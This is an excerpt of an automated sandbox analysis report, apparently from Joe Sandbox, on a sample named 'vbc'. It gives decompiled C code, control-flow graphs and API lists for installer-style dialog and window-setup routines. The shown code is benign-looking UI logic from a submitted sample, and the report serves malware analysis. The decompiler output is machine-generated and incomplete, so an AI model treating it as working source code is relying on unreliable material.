404078-404079 238->241 242 40407b-40407e 238->242 239->217 239->238 244 4040a9-4040ae call 40444f 241->244 245 404080-404086 242->245 246 40408c-404091 242->246 244->212 248 4040c7-4040d7 SendMessageW 245->248 251 404088-40408a 245->251 247 404093-404099 246->247 246->248 252 4040b0-4040b9 call 40140b 247->252 253 40409b-4040a1 call 40140b 247->253 248->212 251->244 252->212 263 4040bb-4040c5 252->263 262 4040a7 253->262 262->244 263->262 270 404283-404284 266->270 271 404286 266->271 267->266 272 404288-4042b6 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042b8-4042c9 SendMessageW 272->273 274 4042cb 272->274 275 4042d1-404310 call 4044ab call 403f58 call 40651a lstrlenW call 406557 SetWindowTextW call 401389 273->275 274->275 275->218 286 404316-404318 275->286 286->218 287 40431e-404322 286->287 288 404341-404355 DestroyWindow 287->288 289 404324-40432a 287->289 288->222 291 40435b-404388 CreateDialogParamW 288->291 289->217 290 404330-404336 289->290 290->218 292 40433c 290->292 291->222 293 40438e-4043e5 call 404476 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->217 293->217 298 4043e7-4043fa ShowWindow call 4044c2 293->298 300 4043ff 298->300 300->222
                    C-Code - Quality: 86%
                    			E00403F77(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                    				struct HWND__* _v28;
                    				void* _v80;
                    				void* _v84;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t34;
                    				signed int _t36;
                    				signed int _t38;
                    				struct HWND__* _t48;
                    				signed int _t67;
                    				struct HWND__* _t73;
                    				signed int _t86;
                    				struct HWND__* _t91;
                    				signed int _t99;
                    				int _t103;
                    				signed int _t117;
                    				int _t118;
                    				int _t122;
                    				signed int _t124;
                    				struct HWND__* _t127;
                    				struct HWND__* _t128;
                    				int _t129;
                    				intOrPtr _t130;
                    				long _t133;
                    				int _t135;
                    				int _t136;
                    				void* _t137;
                    
                    				_t130 = _a8;
                    				if(_t130 == 0x110 || _t130 == 0x408) {
                    					_t34 = _a12;
                    					_t127 = _a4;
                    					__eflags = _t130 - 0x110;
                    					 *0x7a1f30 = _t34;
                    					if(_t130 == 0x110) {
                    						 *0x7a8a68 = _t127;
                    						 *0x7a1f44 = GetDlgItem(_t127, 1);
                    						_t91 = GetDlgItem(_t127, 2);
                    						_push(0xffffffff);
                    						_push(0x1c);
                    						 *0x79ff10 = _t91;
                    						E00404476(_t127);
                    						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a48);
                    						 *0x7a7a2c = E0040140B(4);
                    						_t34 = 1;
                    						__eflags = 1;
                    						 *0x7a1f30 = 1;
                    					}
                    					_t124 =  *0x40a368; // 0x0
                    					_t136 = 0;
                    					_t133 = (_t124 << 6) +  *0x7a8a80;
                    					__eflags = _t124;
                    					if(_t124 < 0) {
                    						L36:
                    						E004044C2(0x40b);
                    						while(1) {
                    							_t36 =  *0x7a1f30;
                    							 *0x40a368 =  *0x40a368 + _t36;
                    							_t133 = _t133 + (_t36 << 6);
                    							_t38 =  *0x40a368; // 0x0
                    							__eflags = _t38 -  *0x7a8a84;
                    							if(_t38 ==  *0x7a8a84) {
                    								E0040140B(1);
                    							}
                    							__eflags =  *0x7a7a2c - _t136;
                    							if( *0x7a7a2c != _t136) {
                    								break;
                    							}
                    							__eflags =  *0x40a368 -  *0x7a8a84; // 0x0
                    							if(__eflags >= 0) {
                    								break;
                    							}
                    							_t117 =  *(_t133 + 0x14);
                    							E00406557(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
                    							_push( *((intOrPtr*)(_t133 + 0x20)));
                    							_push(0xfffffc19);
                    							E00404476(_t127);
                    							_push( *((intOrPtr*)(_t133 + 0x1c)));
                    							_push(0xfffffc1b);
                    							E00404476(_t127);
                    							_push( *((intOrPtr*)(_t133 + 0x28)));
                    							_push(0xfffffc1a);
                    							E00404476(_t127);
                    							_t48 = GetDlgItem(_t127, 3);
                    							__eflags =  *0x7a8aec - _t136;
                    							_v28 = _t48;
                    							if( *0x7a8aec != _t136) {
                    								_t117 = _t117 & 0x0000fefd | 0x00000004;
                    								__eflags = _t117;
                    							}
                    							ShowWindow(_t48, _t117 & 0x00000008); // executed
                    							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                    							E00404498(_t117 & 0x00000002);
                    							_t118 = _t117 & 0x00000004;
                    							EnableWindow( *0x79ff10, _t118);
                    							__eflags = _t118 - _t136;
                    							if(_t118 == _t136) {
                    								_push(1);
                    							} else {
                    								_push(_t136);
                    							}
                    							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                    							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                    							__eflags =  *0x7a8aec - _t136;
                    							if( *0x7a8aec == _t136) {
                    								_push( *0x7a1f44);
                    							} else {
                    								SendMessageW(_t127, 0x401, 2, _t136);
                    								_push( *0x79ff10);
                    							}
                    							E004044AB();
                    							E0040651A(0x7a1f48, E00403F58());
                    							E00406557(0x7a1f48, _t127, _t133,  &(0x7a1f48[lstrlenW(0x7a1f48)]),  *((intOrPtr*)(_t133 + 0x18)));
                    							SetWindowTextW(_t127, 0x7a1f48); // executed
                    							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
                    							__eflags = _t67;
                    							if(_t67 != 0) {
                    								continue;
                    							} else {
                    								__eflags =  *_t133 - _t136;
                    								if( *_t133 == _t136) {
                    									continue;
                    								}
                    								__eflags =  *(_t133 + 4) - 5;
                    								if( *(_t133 + 4) != 5) {
                    									DestroyWindow( *0x7a7a38); // executed
                    									 *0x7a0f20 = _t133;
                    									__eflags =  *_t133 - _t136;
                    									if( *_t133 <= _t136) {
                    										goto L60;
                    									}
                    									_t73 = CreateDialogParamW( *0x7a8a60,  *_t133 +  *0x7a7a40 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "5F@"), _t133); // executed
                    									__eflags = _t73 - _t136;
                    									 *0x7a7a38 = _t73;
                    									if(_t73 == _t136) {
                    										goto L60;
                    									}
                    									_push( *((intOrPtr*)(_t133 + 0x2c)));
                    									_push(6);
                    									E00404476(_t73);
                    									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                    									ScreenToClient(_t127, _t137 + 0x10);
                    									SetWindowPos( *0x7a7a38, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                    									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
                    									__eflags =  *0x7a7a2c - _t136;
                    									if( *0x7a7a2c != _t136) {
                    										goto L63;
                    									}
                    									ShowWindow( *0x7a7a38, 8); // executed
                    									E004044C2(0x405);
                    									goto L60;
                    								}
                    								__eflags =  *0x7a8aec - _t136;
                    								if( *0x7a8aec != _t136) {
                    									goto L63;
                    								}
                    								__eflags =  *0x7a8ae0 - _t136;
                    								if( *0x7a8ae0 != _t136) {
                    									continue;
                    								}
                    								goto L63;
                    							}
                    						}
                    						DestroyWindow( *0x7a7a38);
                    						 *0x7a8a68 = _t136;
                    						EndDialog(_t127,  *0x7a0718);
                    						goto L60;
                    					} else {
                    						__eflags = _t34 - 1;
                    						if(_t34 != 1) {
                    							L35:
                    							__eflags =  *_t133 - _t136;
                    							if( *_t133 == _t136) {
                    								goto L63;
                    							}
                    							goto L36;
                    						}
                    						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
                    						__eflags = _t86;
                    						if(_t86 == 0) {
                    							goto L35;
                    						}
                    						SendMessageW( *0x7a7a38, 0x40f, 0, 1);
                    						__eflags =  *0x7a7a2c;
                    						return 0 |  *0x7a7a2c == 0x00000000;
                    					}
                    				} else {
                    					_t127 = _a4;
                    					_t136 = 0;
                    					if(_t130 == 0x47) {
                    						SetWindowPos( *0x7a1f28, _t127, 0, 0, 0, 0, 0x13);
                    					}
                    					_t122 = _a12;
                    					if(_t130 != 5) {
                    						L8:
                    						if(_t130 != 0x40d) {
                    							__eflags = _t130 - 0x11;
                    							if(_t130 != 0x11) {
                    								__eflags = _t130 - 0x111;
                    								if(_t130 != 0x111) {
                    									goto L28;
                    								}
                    								_t135 = _t122 & 0x0000ffff;
                    								_t128 = GetDlgItem(_t127, _t135);
                    								__eflags = _t128 - _t136;
                    								if(_t128 == _t136) {
                    									L15:
                    									__eflags = _t135 - 1;
                    									if(_t135 != 1) {
                    										__eflags = _t135 - 3;
                    										if(_t135 != 3) {
                    											_t129 = 2;
                    											__eflags = _t135 - _t129;
                    											if(_t135 != _t129) {
                    												L27:
                    												SendMessageW( *0x7a7a38, 0x111, _t122, _a16);
                    												goto L28;
                    											}
                    											__eflags =  *0x7a8aec - _t136;
                    											if( *0x7a8aec == _t136) {
                    												_t99 = E0040140B(3);
                    												__eflags = _t99;
                    												if(_t99 != 0) {
                    													goto L28;
                    												}
                    												 *0x7a0718 = 1;
                    												L23:
                    												_push(0x78);
                    												L24:
                    												E0040444F();
                    												goto L28;
                    											}
                    											E0040140B(_t129);
                    											 *0x7a0718 = _t129;
                    											goto L23;
                    										}
                    										__eflags =  *0x40a368 - _t136; // 0x0
                    										if(__eflags <= 0) {
                    											goto L27;
                    										}
                    										_push(0xffffffff);
                    										goto L24;
                    									}
                    									_push(_t135);
                    									goto L24;
                    								}
                    								SendMessageW(_t128, 0xf3, _t136, _t136);
                    								_t103 = IsWindowEnabled(_t128);
                    								__eflags = _t103;
                    								if(_t103 == 0) {
                    									L63:
                    									return 0;
                    								}
                    								goto L15;
                    							}
                    							SetWindowLongW(_t127, _t136, _t136);
                    							return 1;
                    						}
                    						DestroyWindow( *0x7a7a38);
                    						 *0x7a7a38 = _t122;
                    						L60:
                    						if( *0x7a3f48 == _t136 &&  *0x7a7a38 != _t136) {
                    							ShowWindow(_t127, 0xa); // executed
                    							 *0x7a3f48 = 1;
                    						}
                    						goto L63;
                    					} else {
                    						asm("sbb eax, eax");
                    						ShowWindow( *0x7a1f28,  ~(_t122 - 1) & 0x00000005);
                    						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                    							L28:
                    							return E004044DD(_a8, _t122, _a16);
                    						} else {
                    							ShowWindow(_t127, 4);
                    							goto L8;
                    						}
                    					}
                    				}
                    			}































                    0x00403f82
                    0x00403f89
                    0x004040f0
                    0x004040f4
                    0x004040f8
                    0x004040fa
                    0x004040ff
                    0x0040410a
                    0x00404115
                    0x0040411a
                    0x0040411c
                    0x0040411e
                    0x00404121
                    0x00404126
                    0x00404134
                    0x00404141
                    0x00404148
                    0x00404148
                    0x00404149
                    0x00404149
                    0x0040414e
                    0x00404154
                    0x0040415b
                    0x00404161
                    0x00404163
                    0x004041a3
                    0x004041a8
                    0x004041ad
                    0x004041ad
                    0x004041b2
                    0x004041bb
                    0x004041bd
                    0x004041c2
                    0x004041c8
                    0x004041cc
                    0x004041cc
                    0x004041d1
                    0x004041d7
                    0x00000000
                    0x00000000
                    0x004041e2
                    0x004041e8
                    0x00000000
                    0x00000000
                    0x004041f1
                    0x004041f9
                    0x004041fe
                    0x00404201
                    0x00404207
                    0x0040420c
                    0x0040420f
                    0x00404215
                    0x0040421a
                    0x0040421d
                    0x00404223
                    0x0040422b
                    0x00404231
                    0x00404237
                    0x0040423b
                    0x00404242
                    0x00404242
                    0x00404242
                    0x0040424c
                    0x0040425e
                    0x0040426a
                    0x0040426f
                    0x00404279
                    0x0040427f
                    0x00404281
                    0x00404286
                    0x00404283
                    0x00404283
                    0x00404283
                    0x00404296
                    0x004042ae
                    0x004042b0
                    0x004042b6
                    0x004042cb
                    0x004042b8
                    0x004042c1
                    0x004042c3
                    0x004042c3
                    0x004042d1
                    0x004042e2
                    0x004042f8
                    0x004042ff
                    0x00404309
                    0x0040430e
                    0x00404310
                    0x00000000
                    0x00404316
                    0x00404316
                    0x00404318
                    0x00000000
                    0x00000000
                    0x0040431e
                    0x00404322
                    0x00404347
                    0x0040434d
                    0x00404353
                    0x00404355
                    0x00000000
                    0x00000000
                    0x0040437b
                    0x00404381
                    0x00404383
                    0x00404388
                    0x00000000
                    0x00000000
                    0x0040438e
                    0x00404391
                    0x00404394
                    0x004043ab
                    0x004043b7
                    0x004043d0
                    0x004043da
                    0x004043df
                    0x004043e5
                    0x00000000
                    0x00000000
                    0x004043ef
                    0x004043fa
                    0x00000000
                    0x004043fa
                    0x00404324
                    0x0040432a
                    0x00000000
                    0x00000000
                    0x00404330
                    0x00404336
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040433c
                    0x00404310
                    0x00404407
                    0x00404413
                    0x0040441a
                    0x00000000
                    0x00404165
                    0x00404165
                    0x00404168
                    0x0040419b
                    0x0040419b
                    0x0040419d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040419d
                    0x0040416e
                    0x00404173
                    0x00404175
                    0x00000000
                    0x00000000
                    0x00404185
                    0x0040418d
                    0x00000000
                    0x00404193
                    0x00403f9b
                    0x00403f9b
                    0x00403f9f
                    0x00403fa4
                    0x00403fb3
                    0x00403fb3
                    0x00403fb9
                    0x00403fc0
                    0x00404004
                    0x0040400a
                    0x00404023
                    0x00404026
                    0x00404039
                    0x0040403f
                    0x00000000
                    0x00000000
                    0x00404045
                    0x00404050
                    0x00404052
                    0x00404054
                    0x00404073
                    0x00404073
                    0x00404076
                    0x0040407b
                    0x0040407e
                    0x0040408e
                    0x0040408f
                    0x00404091
                    0x004040c7
                    0x004040d7
                    0x00000000
                    0x004040d7
                    0x00404093
                    0x00404099
                    0x004040b2
                    0x004040b7
                    0x004040b9
                    0x00000000
                    0x00000000
                    0x004040bb
                    0x004040a7
                    0x004040a7
                    0x004040a9
                    0x004040a9
                    0x00000000
                    0x004040a9
                    0x0040409c
                    0x004040a1
                    0x00000000
                    0x004040a1
                    0x00404080
                    0x00404086
                    0x00000000
                    0x00000000
                    0x00404088
                    0x00000000
                    0x00404088
                    0x00404078
                    0x00000000
                    0x00404078
                    0x0040405e
                    0x00404065
                    0x0040406b
                    0x0040406d
                    0x00404443
                    0x00000000
                    0x00404443
                    0x00000000
                    0x0040406d
                    0x0040402b
                    0x00000000
                    0x00404033
                    0x00404012
                    0x00404018
                    0x00404420
                    0x00404426
                    0x00404433
                    0x00404439
                    0x00404439
                    0x00000000
                    0x00403fc2
                    0x00403fc7
                    0x00403fd3
                    0x00403fdc
                    0x004040dd
                    0x00000000
                    0x00403ffb
                    0x00403ffe
                    0x00000000
                    0x00403ffe
                    0x00403fdc
                    0x00403fc0

                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FB3
                    • ShowWindow.USER32(?), ref: 00403FD3
                    • GetWindowLongW.USER32(?,000000F0), ref: 00403FE5
                    • ShowWindow.USER32(?,00000004), ref: 00403FFE
                    • DestroyWindow.USER32 ref: 00404012
                    • SetWindowLongW.USER32 ref: 0040402B
                    • GetDlgItem.USER32(?,?), ref: 0040404A
                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040405E
                    • IsWindowEnabled.USER32(00000000), ref: 00404065
                    • GetDlgItem.USER32(?,00000001), ref: 00404110
                    • GetDlgItem.USER32(?,00000002), ref: 0040411A
                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404134
                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404185
                    • GetDlgItem.USER32(?,00000003), ref: 0040422B
                    • ShowWindow.USER32(00000000,?), ref: 0040424C
                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040425E
                    • EnableWindow.USER32(?,?), ref: 00404279
                    • GetSystemMenu.USER32 ref: 0040428F
                    • EnableMenuItem.USER32 ref: 00404296
                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042AE
                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042C1
                    • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004042EB
                    • SetWindowTextW.USER32 ref: 004042FF
                    • ShowWindow.USER32(?,0000000A), ref: 00404433
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                    • String ID:
                    • API String ID: 121052019-0
                    • Opcode ID: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
                    • Instruction ID: a523085d0bb4d20675d087507fe11aed99bae63dd77e7307ea40df4209393f8b
                    • Opcode Fuzzy Hash: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
                    • Instruction Fuzzy Hash: 7FC1CEB1500604ABDB206F21ED85E2A3A69FBC6709F00853EF791B25E0CB3D5851DB6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 301 403bc9-403be1 call 4068e7 304 403be3-403bf3 call 406461 301->304 305 403bf5-403c2c call 4063e8 301->305 313 403c4f-403c78 call 403e9f call 405ef1 304->313 309 403c44-403c4a lstrcatW 305->309 310 403c2e-403c3f call 4063e8 305->310 309->313 310->309 319 403d0a-403d12 call 405ef1 313->319 320 403c7e-403c83 313->320 326 403d20-403d45 LoadImageW 319->326 327 403d14-403d1b call 406557 319->327 320->319 321 403c89-403cb1 call 4063e8 320->321 321->319 331 403cb3-403cb7 321->331 329 403dc6-403dce call 40140b 326->329 330 403d47-403d77 RegisterClassW 326->330 327->326 344 403dd0-403dd3 329->344 345 403dd8-403de3 call 403e9f 329->345 332 403e95 330->332 333 403d7d-403dc1 SystemParametersInfoW CreateWindowExW 330->333 335 403cc9-403cd5 lstrlenW 331->335 336 403cb9-403cc6 call 405e16 331->336 338 403e97-403e9e 332->338 333->329 339 403cd7-403ce5 lstrcmpiW 335->339 340 403cfd-403d05 call 405de9 call 40651a 335->340 336->335 339->340 343 403ce7-403cf1 GetFileAttributesW 339->343 340->319 347 403cf3-403cf5 343->347 348 403cf7-403cf8 call 405e35 343->348 344->338 354 403de9-403e03 ShowWindow call 406877 345->354 355 403e6c-403e6d call 40564f 345->355 347->340 347->348 348->340 362 403e05-403e0a call 406877 354->362 363 403e0f-403e21 GetClassInfoW 354->363 358 403e72-403e74 355->358 360 403e76-403e7c 358->360 361 403e8e-403e90 call 40140b 358->361 360->344 366 403e82-403e89 call 40140b 360->366 361->332 362->363 364 403e23-403e33 GetClassInfoW RegisterClassW 363->364 365 403e39-403e5c DialogBoxParamW call 40140b 363->365 364->365 371 403e61-403e6a call 403b19 365->371 366->344 371->338
                    C-Code - Quality: 96%
                    			E00403BC9(void* __eflags) {
                    				intOrPtr _v4;
                    				intOrPtr _v8;
                    				int _v12;
                    				void _v16;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t22;
                    				void* _t30;
                    				void* _t32;
                    				int _t33;
                    				void* _t36;
                    				int _t39;
                    				int _t40;
                    				int _t44;
                    				short _t63;
                    				WCHAR* _t65;
                    				signed char _t69;
                    				WCHAR* _t76;
                    				intOrPtr _t82;
                    				WCHAR* _t87;
                    
                    				_t82 =  *0x7a8a70;
                    				_t22 = E004068E7(2);
                    				_t90 = _t22;
                    				if(_t22 == 0) {
                    					_t76 = 0x7a1f48;
                    					L"1033" = 0x30;
                    					 *0x7b5002 = 0x78;
                    					 *0x7b5004 = 0;
                    					E004063E8(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f48, 0);
                    					__eflags =  *0x7a1f48;
                    					if(__eflags == 0) {
                    						E004063E8(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f48, 0);
                    					}
                    					lstrcatW(L"1033", _t76);
                    				} else {
                    					E00406461(L"1033",  *_t22() & 0x0000ffff);
                    				}
                    				E00403E9F(_t78, _t90);
                    				 *0x7a8ae0 =  *0x7a8a78 & 0x00000020;
                    				 *0x7a8afc = 0x10000;
                    				if(E00405EF1(_t90, 0x7b3800) != 0) {
                    					L16:
                    					if(E00405EF1(_t98, 0x7b3800) == 0) {
                    						E00406557(_t76, 0, _t82, 0x7b3800,  *((intOrPtr*)(_t82 + 0x118)));
                    					}
                    					_t30 = LoadImageW( *0x7a8a60, 0x67, 1, 0, 0, 0x8040);
                    					 *0x7a7a48 = _t30;
                    					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                    						L21:
                    						if(E0040140B(0) == 0) {
                    							_t32 = E00403E9F(_t78, __eflags);
                    							__eflags =  *0x7a8b00;
                    							if( *0x7a8b00 != 0) {
                    								_t33 = E0040564F(_t32, 0);
                    								__eflags = _t33;
                    								if(_t33 == 0) {
                    									E0040140B(1);
                    									goto L33;
                    								}
                    								__eflags =  *0x7a7a2c;
                    								if( *0x7a7a2c == 0) {
                    									E0040140B(2);
                    								}
                    								goto L22;
                    							}
                    							ShowWindow( *0x7a1f28, 5); // executed
                    							_t39 = E00406877("RichEd20"); // executed
                    							__eflags = _t39;
                    							if(_t39 == 0) {
                    								E00406877("RichEd32");
                    							}
                    							_t87 = L"RichEdit20W";
                    							_t40 = GetClassInfoW(0, _t87, 0x7a7a00);
                    							__eflags = _t40;
                    							if(_t40 == 0) {
                    								GetClassInfoW(0, L"RichEdit", 0x7a7a00);
                    								 *0x7a7a24 = _t87;
                    								RegisterClassW(0x7a7a00);
                    							}
                    							_t44 = DialogBoxParamW( *0x7a8a60,  *0x7a7a40 + 0x00000069 & 0x0000ffff, 0, E00403F77, 0); // executed
                    							E00403B19(E0040140B(5), 1);
                    							return _t44;
                    						}
                    						L22:
                    						_t36 = 2;
                    						return _t36;
                    					} else {
                    						_t78 =  *0x7a8a60;
                    						 *0x7a7a04 = E00401000;
                    						 *0x7a7a10 =  *0x7a8a60;
                    						 *0x7a7a14 = _t30;
                    						 *0x7a7a24 = 0x40a380;
                    						if(RegisterClassW(0x7a7a00) == 0) {
                    							L33:
                    							__eflags = 0;
                    							return 0;
                    						}
                    						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                    						 *0x7a1f28 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a60, 0);
                    						goto L21;
                    					}
                    				} else {
                    					_t78 =  *(_t82 + 0x48);
                    					_t92 = _t78;
                    					if(_t78 == 0) {
                    						goto L16;
                    					}
                    					_t76 = 0x7a6a00;
                    					E004063E8(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a98 + _t78 * 2,  *0x7a8a98 +  *(_t82 + 0x4c) * 2, 0x7a6a00, 0);
                    					_t63 =  *0x7a6a00; // 0x43
                    					if(_t63 == 0) {
                    						goto L16;
                    					}
                    					if(_t63 == 0x22) {
                    						_t76 = 0x7a6a02;
                    						 *((short*)(E00405E16(0x7a6a02, 0x22))) = 0;
                    					}
                    					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                    					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                    						L15:
                    						E0040651A(0x7b3800, E00405DE9(_t76));
                    						goto L16;
                    					} else {
                    						_t69 = GetFileAttributesW(_t76);
                    						if(_t69 == 0xffffffff) {
                    							L14:
                    							E00405E35(_t76);
                    							goto L15;
                    						}
                    						_t98 = _t69 & 0x00000010;
                    						if((_t69 & 0x00000010) != 0) {
                    							goto L15;
                    						}
                    						goto L14;
                    					}
                    				}
                    			}
























                    0x00403bcf
                    0x00403bd8
                    0x00403bdf
                    0x00403be1
                    0x00403bf5
                    0x00403c07
                    0x00403c10
                    0x00403c19
                    0x00403c20
                    0x00403c25
                    0x00403c2c
                    0x00403c3f
                    0x00403c3f
                    0x00403c4a
                    0x00403be3
                    0x00403bee
                    0x00403bee
                    0x00403c4f
                    0x00403c62
                    0x00403c67
                    0x00403c78
                    0x00403d0a
                    0x00403d12
                    0x00403d1b
                    0x00403d1b
                    0x00403d31
                    0x00403d37
                    0x00403d45
                    0x00403dc6
                    0x00403dce
                    0x00403dd8
                    0x00403ddd
                    0x00403de3
                    0x00403e6d
                    0x00403e72
                    0x00403e74
                    0x00403e90
                    0x00000000
                    0x00403e90
                    0x00403e76
                    0x00403e7c
                    0x00403e84
                    0x00403e84
                    0x00000000
                    0x00403e7c
                    0x00403df1
                    0x00403dfc
                    0x00403e01
                    0x00403e03
                    0x00403e0a
                    0x00403e0a
                    0x00403e15
                    0x00403e1d
                    0x00403e1f
                    0x00403e21
                    0x00403e2a
                    0x00403e2d
                    0x00403e33
                    0x00403e33
                    0x00403e52
                    0x00403e63
                    0x00000000
                    0x00403e68
                    0x00403dd0
                    0x00403dd2
                    0x00000000
                    0x00403d47
                    0x00403d47
                    0x00403d53
                    0x00403d5d
                    0x00403d63
                    0x00403d68
                    0x00403d77
                    0x00403e95
                    0x00403e95
                    0x00000000
                    0x00403e95
                    0x00403d86
                    0x00403dc1
                    0x00000000
                    0x00403dc1
                    0x00403c7e
                    0x00403c7e
                    0x00403c81
                    0x00403c83
                    0x00000000
                    0x00000000
                    0x00403c91
                    0x00403ca3
                    0x00403ca8
                    0x00403cb1
                    0x00000000
                    0x00000000
                    0x00403cb7
                    0x00403cb9
                    0x00403cc6
                    0x00403cc6
                    0x00403ccf
                    0x00403cd5
                    0x00403cfd
                    0x00403d05
                    0x00000000
                    0x00403ce7
                    0x00403ce8
                    0x00403cf1
                    0x00403cf7
                    0x00403cf8
                    0x00000000
                    0x00403cf8
                    0x00403cf3
                    0x00403cf5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403cf5
                    0x00403cd5

                    APIs
                      • Part of subcall function 004068E7: GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                      • Part of subcall function 004068E7: GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                    • lstrcatW.KERNEL32 ref: 00403C4A
                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,007B3800,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,7556D4C4), ref: 00403CCA
                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,007B3800,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403CDD
                    • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403CE8
                    • LoadImageW.USER32 ref: 00403D31
                      • Part of subcall function 00406461: wsprintfW.USER32 ref: 0040646E
                    • RegisterClassW.USER32 ref: 00403D6E
                    • SystemParametersInfoW.USER32 ref: 00403D86
                    • CreateWindowExW.USER32 ref: 00403DBB
                    • ShowWindow.USER32(00000005,00000000), ref: 00403DF1
                    • GetClassInfoW.USER32 ref: 00403E1D
                    • GetClassInfoW.USER32 ref: 00403E2A
                    • RegisterClassW.USER32 ref: 00403E33
                    • DialogBoxParamW.USER32 ref: 00403E52
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
